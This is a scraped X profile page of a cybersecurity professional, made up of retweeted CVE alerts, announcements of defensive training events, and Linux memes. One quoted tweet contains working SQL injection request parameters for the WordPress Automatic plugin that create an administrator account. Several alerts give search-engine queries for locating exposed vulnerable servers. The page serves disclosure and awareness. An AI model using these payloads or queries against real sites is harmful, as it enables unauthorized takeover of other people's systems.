Josmell Chavarri

1.3K posts

Josmell Chavarri banner
Josmell Chavarri

Josmell Chavarri

@j0sm3ll

Cybersecurity Professional | InfoSec “Lee y conducirás, no leas y serás conducido”.

Katılım Ocak 2012
415 Takip Edilen267 Takipçiler
Josmell Chavarri retweetledi
Hunter
Hunter@HunterMapping·
🚨Alert🚨CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server 🔥PoC:github.com/absholi7ly/Byp… ⚠It could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data. 📊248K+ Services are found on hunter.how 🔗Hunter Link:hunter.how/list?searchVal… 📰Refer:securityonline.info/cve-2024-4985-… 👇Query Hunter:/product.name="Github Enterprise" FOFA:app="Github-Enterprise" SHODAN:http.html:"Github Enterprise" #GitHub #hunterhow #infosec #infosecurity #Infosys #Vulnerability
Hunter tweet media
absholi7ly@absholi7ly

🔥Poc CVE-2024-4985 #Bypass authentication #GitHub Enterprise Server github.com/absholi7ly/Byp… @HunterMapping @the_yellow_fall @fofabot @Dinosn

English
3
73
193
31.9K
Josmell Chavarri retweetledi
Hunter
Hunter@HunterMapping·
🚨Alert🚨CVE-2024-22120 (CVSS 9.1): Zabbix SQLi Vulnerability Exposes IT Infrastructure to Attack 🔥PoC: support.zabbix.com/browse/ZBX-245… 🔥PoC: github.com/W01fh4cker/CVE… ⚠This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE). 📰Refer:securityonline.info/cve-2024-22120… 👇👇👇Hunter is currently under maintenance. You can search on FOFA or SHODAN using the following search syntax. Hunter:/product.name="Zabbix" FOFA:app="ZABBIX-Monitoring" SHODAN:http.component:"Zabbix" #Zabbix #RCE #infosec #infosecurity #Infosys #Vulnerability
Hunter tweet media
English
1
85
271
30.1K
Josmell Chavarri retweetledi
Hunter
Hunter@HunterMapping·
🔥PoC for CVE-2024-27956(CVSS 9.9 🔥), Published by @MrTuxracer 📊6K+ Services are found on Hunter.how 🔗Hunter Link:hunter.how/list?searchVal…
Julien | MrTuxracer 🇪🇺@MrTuxracer

Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. Adding a new WordPress user: q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28 Giving the user admin rights: q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c Get pwned: Note: Param "integ" is the md5sum of the query.

English
6
33
93
36.4K
Josmell Chavarri retweetledi
Hunter
Hunter@HunterMapping·
🚨Alert🚨CVE-2024-27956(CVSS 9.9 🔥): A WordPress SQL injection vulnerability in the WP-Automatic plugin ⚠More than 5.5 million attacks in just one month! Attackers can gain unauthorized access to websites and potentially take full control of them. 📊6K+ Services are found on Hunter.how 🔗Hunter Link:hunter.how/list?searchVal… 📰Refer: hackhunting.com/2024/04/25/cve… 👇Query Hunter:web.body="wp-content/plugins/wp-automatic" #WordPress #hunterhow #infosec #infosecurity #Infosys #vulnerability
Hunter tweet media
English
3
51
147
25.7K
Josmell Chavarri retweetledi
Hunter
Hunter@HunterMapping·
🚨Alert🚨CVE-2024-3400: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect(CVSS: 10) ⚠It enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. 📊 371K+ Services are found on Hunter.how 🔗Hunter Link: hunter.how/list?searchVal… 📰Deep Dive: unit42.paloaltonetworks.com/cve-2024-3400/… 👇Query Hunter: /product.name="GlobalProtect Portal" FOFA: app="paloalto-GlobalProtect" SHODAN: title:"GlobalProtect Portal" #paloalto #GlobalProtect #hunterhow #infosec #infosecurity #Infosys #Vulnerability
Hunter tweet media
English
2
84
277
62.1K
Josmell Chavarri retweetledi
CISA Cyber
CISA Cyber@CISACyber·
We’re responding to CVE-2024-3094, a reported supply chain compromise affecting XZ Utils versions 5.6.0 and 5.6.1. XZ Utils may be present in Linux distributions. See our additional guidance at cisa.gov/news-events/al….
English
20
527
1.1K
284.9K
Josmell Chavarri retweetledi
Guayoyo
Guayoyo@GuayoyoCyber·
Estuvimos en el #CSIRTAmericasWEEK de @OEA_Cyber impartiendo capacitación en "Detección de amenazas y respuesta activa de incidentes de #Ciberseguridad", con la participación de los #CSIRT miembros de la red #CSIRTAmericas de Colombia. ¡Excelente instancia de colaboración!🛡️🇨🇴
Guayoyo tweet mediaGuayoyo tweet mediaGuayoyo tweet media
Español
0
5
7
408
Pyxis
Pyxis@Pyxisportal·
El documental ''Detrás del código'' reúne experiencias inspiradoras de personas que encontraron su camino y transformaron sus vidas gracias a la tecnología 💪🏻 Adriana Marchisio, tester funcional en nuestro equipo, es una de esas historias. Repasala aquí youtu.be/QMbr_HNAbjU?si…
YouTube video
YouTube
Español
3
5
27
2K
Josmell Chavarri retweetledi
Guayoyo
Guayoyo@GuayoyoCyber·
¡Emocionados de anunciar que seremos anfitriones y patrocinadores de la meetup de @hackthebox_eu Uruguay! 🚀 Como equipo apasionado por la ciberseguridad, estamos encantados de ser parte de este evento que reúne a mentes brillantes y apasionadas por la ciberseguridad. 🛡️ 🧵👇🏽
Guayoyo tweet media
Español
1
5
14
578
Josmell Chavarri retweetledi
Guayoyo
Guayoyo@GuayoyoCyber·
Nuestros compañeros @3ddavid y @j0sm3ll presentes en las jornadas #XVIIJornadasCCNCERT #VJornadasESPDEFCERT 👨🏻‍🚀👨🏻‍🚀🚀 🇺🇾🇪🇸
CCN-CERT@CCNCERT

Seguimos en la sala 19 con el "Taller de detección de amenazas y respuesta activa" impartido por Edgar David Salazar y Josmell Antonio Chávarri, ambos profesionales de @GuayoyoCyber #XVIIJornadasCCNCERT #VJornadasESPDEFCERT #RootedLabs

Pozuelo de Alarcón, Spain 🇪🇸 Español
0
3
16
536
Josmell Chavarri retweetledi
Guayoyo
Guayoyo@GuayoyoCyber·
En el marco del proyecto #CSIRTAmericas de @OEA_Cyber el pasado viernes en Ecuador 🇪🇨 realizamos el entrenamiento "Detección de Amenazas y Respuesta Activa a Ciberataques" basado en el XDR OpenSource @wazuh, a miembros de los #CSIRTs nacionales @CSIRTEcuador y @EcuCERT_EC 🚀👨🏻‍🚀💪
Quito, Ecuador 🇪🇨 Español
2
18
30
2.7K
Josmell Chavarri retweetledi
Guayoyo
Guayoyo@GuayoyoCyber·
En 5 minutos @j0sm3ll estará en el ISACA @MvdChapter hablando sobre "Metodologías de Seguridad para Contenedores" 🚢🔒🛡️
Guayoyo tweet media
Español
0
6
6
0
Josmell Chavarri retweetledi
nixCraft 🐧
nixCraft 🐧@nixcraft·
Running your software project on a local Linux container on your laptop be like ...
English
24
368
2K
0
Josmell Chavarri retweetledi
nixCraft 🐧
nixCraft 🐧@nixcraft·
Linux developers and users be like ...
nixCraft 🐧 tweet media
English
38
372
2.3K
0
Josmell Chavarri retweetledi
nixCraft 🐧
nixCraft 🐧@nixcraft·
OMG. Rare pic of well-written documentation.
nixCraft 🐧 tweet media
English
21
297
1.9K
0
Josmell Chavarri retweetledi
nixCraft 🐧
nixCraft 🐧@nixcraft·
wtf?
nixCraft 🐧 tweet media
129
205
1.5K
0

Keşfet

@MrTuxracer @OEA_Cyber @Pyxisportal @hackthebox_eu @3ddavid @wazuh @CSIRTEcuador @EcuCERT_EC